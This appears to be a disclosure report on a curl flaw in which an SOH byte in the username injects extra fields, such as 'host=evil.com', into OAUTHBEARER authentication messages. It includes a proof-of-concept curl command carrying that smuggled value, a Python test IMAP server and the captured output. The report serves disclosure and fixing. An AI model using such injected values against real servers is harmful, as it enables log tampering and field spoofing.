In curl's SASL OAUTHBEARER authentication, including the SOH character (0x01) in the username corrupts the message structure.

## Summary: This vulnerability arises because curl fails to validate the contents of the username when constructing OAuth2 authentication messages. Depending on the server-side implementation, this could lead to log tampering or credential spoofing. ## Affected version curl 8.18.0 (x86_64-apple-darwin23.6.0) ## Steps To Reproduce: 1. Set up an IMAP server using Python (port 1430) 2. Execute curl with the username set to `user\x01host=evil.com`: `curl -v --url “imap://127.0.0.1:1430” -u "$(python3 -c 'import sys; sys.stdout.buffer.write(b“user\x01host=evil.com”)'):TOKEN“ --oauth2-bearer ”TOKEN"` ## Actual Output: --- AUTH MESSAGE RECEIVED --- Raw: b'bixhPXVzZXIBaG9zdD1ldmlsLmNvbSwBaG9zdD0xMjcuMC4wLjEBcG9ydD0xNDMwAWF1dGg9QmVhcmVyIFRPS0VOAQE=' --- DECODED MESSAGE --- b'n,a=user[SOH]host=evil.com,[SOH]host=127.0.0.1[SOH]port=1430[SOH]auth=Bearer TOKEN[SOH][SOH]' ## Expected behavior: The SOH character in the username should be rejected with an error (e.g., CURLE_AUTH_ERROR). ## Actual behavior: The SOH character is passed through without validation, resulting in protocol field injection. ## Supporting Material: Python code for IMAP server (for Steps To Reproduce section) ```python import socket import base64 def start_server(): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) s.bind(('127.0.0.1', 1430)) s.listen(1) print("Waiting for IMAP OAuth message on port 1430...") while True: conn, addr = s.accept() try: conn.send(b"* OK IMAP4rev1 Server Ready\r\n") conn.recv(1024) conn.send(b"* CAPABILITY IMAP4rev1 AUTH=OAUTHBEARER\r\nA001 OK\r\n") conn.recv(1024) conn.send(b"+ \r\n") final_data = conn.recv(4096) if final_data: print(f"\n--- AUTH MESSAGE RECEIVED ---") print(f"Raw: {final_data.strip()}") try: decoded = base64.b64decode(final_data.strip()) print(f"--- DECODED MESSAGE ---") print(decoded.replace(b'\x01', b'[SOH]')) except: print("Could not decode base64") except Exception as e: print(f"Error: {e}") finally: conn.close() if __name__ == "__main__": start_server() ``` ## Impact ## Summary: curl does not validate the username for SOH (0x01) characters before constructing OAUTHBEARER messages. The username should normally be a single block of data following `n,a=`. However, in this example, mixing in `\x01host=evil.com` causes `host=evil.com` to reach the server as an independent field. This means that another field within the protocol can potentially be rewritten from the username input field. Furthermore, even though the connection is actually made to 127.0.0.1, it may appear in logs as an access attempt to a different host. Server logs could record this as a connection attempt to host=evil.com. This allows attackers to conceal their actions or potentially deceive log audits.